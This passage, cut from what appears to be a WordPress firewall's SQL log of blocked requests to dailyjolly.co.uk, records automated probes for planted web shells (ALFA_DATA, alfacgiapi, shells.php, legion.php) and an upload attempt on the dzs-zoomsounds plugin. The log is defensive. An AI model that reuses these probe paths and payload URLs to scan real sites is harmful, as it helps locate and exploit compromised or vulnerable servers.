User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11813,1674417643.655191,1674417643.511800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgi-bin/mt/mt-xmlrpc.cgi','http://www.dailyjolly.co.uk/cgi-bin/mt/mt-xmlrpc.cgi','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vbXQvbXQteG1scnBjLmNnaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11814,1674417643.648978,1674417643.512500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=S7UfQilj.php','http://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=S7UfQilj.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9zYXZlcG5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11815,1674417664.439136,1674417664.302600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/mt/mt-xmlrpc.cgi','http://www.dailyjolly.co.uk/mt/mt-xmlrpc.cgi','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L210L210LXhtbHJwYy5jZ2k=\",\"category\":\"brute-force\",\"ssl\":1}'),(11816,1674417659.299351,1674417659.170300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa','http://www.dailyjolly.co.uk/css/ALFA_DATA/alfacgiapi/perl.alfa','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy9BTEZBX0RBVEEvYWxmYWNnaWFwaS9wZXJsLmFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11817,1674417671.107241,1674417670.987800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgi-bin/mt-xmlrpc.cgi','http://www.dailyjolly.co.uk/cgi-bin/mt-xmlrpc.cgi','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vbXQteG1scnBjLmNnaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11818,1674417670.021510,1674417669.891400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','http://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11819,1674424597.388456,1674424597.252300,'\0\0\0\0\0\0\0\0\0\0��&�',0,403,0,0,0,'https://dailyjolly.co.uk/2/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11820,1674426655.473910,1674426655.363000,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11821,1674426664.649399,1674426664.534100,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11822,1674435790.852022,1674435790.716000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11823,1674435748.067659,1674435747.938600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11824,1674435643.983100,1674435643.855600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11825,1674435558.266920,1674435558.148500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11826,1674435558.068682,1674435557.939100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11827,1674435513.852782,1674435513.736100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11828,1674435513.606424,1674435513.477700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11829,1674436044.739634,1674436044.609900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11830,1674436019.674490,1674436019.546000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11831,1674435854.362727,1674435854.230100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11832,1674436744.315943,1674436744.175900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11833,1674436375.296342,1674436375.161700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11834,1674437515.155626,1674437515.025100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11835,1674437496.417005,1674437496.256200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11836,1674438510.950890,1674438510.823400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11837,1674438399.668494,1674438399.538300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11838,1674438274.752418,1674438274.584000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11839,1674438166.270796,1674438166.126700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11840,1674438137.449248,1674438137.293900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11841,1674438017.975030,1674438017.845200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11842,1674437911.787182,1674437911.653600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11843,1674437881.146713,1674437881.024000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11844,1674437880.949434,1674437880.800700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11845,1674437536.185556,1674437536.049300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11846,1674439084.550585,1674439084.432600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11847,1674439084.241414,1674439084.129500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11848,1674439083.950274,1674439083.826800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11849,1674439083.628235,1674439083.473800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11850,1674438935.382552,1674438935.233800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11851,1674439625.527357,1674439625.377600,'\0\0\0\0\0\0\0\0\0\0��W���',0,403,0,0,0,'https://dailyjolly.co.uk/20/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwL2xpY2Vuc2UudHh0\",\"category\":\"brute-force\",\"ssl\":1}'),(11852,1674439200.201132,1674439200.089100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11853,1674439200.036641,1674439199.924800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11854,1674439199.840569,1674439199.726900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11855,1674439199.674408,1674439199.559800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11856,1674439199.507186,1674439199.401300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 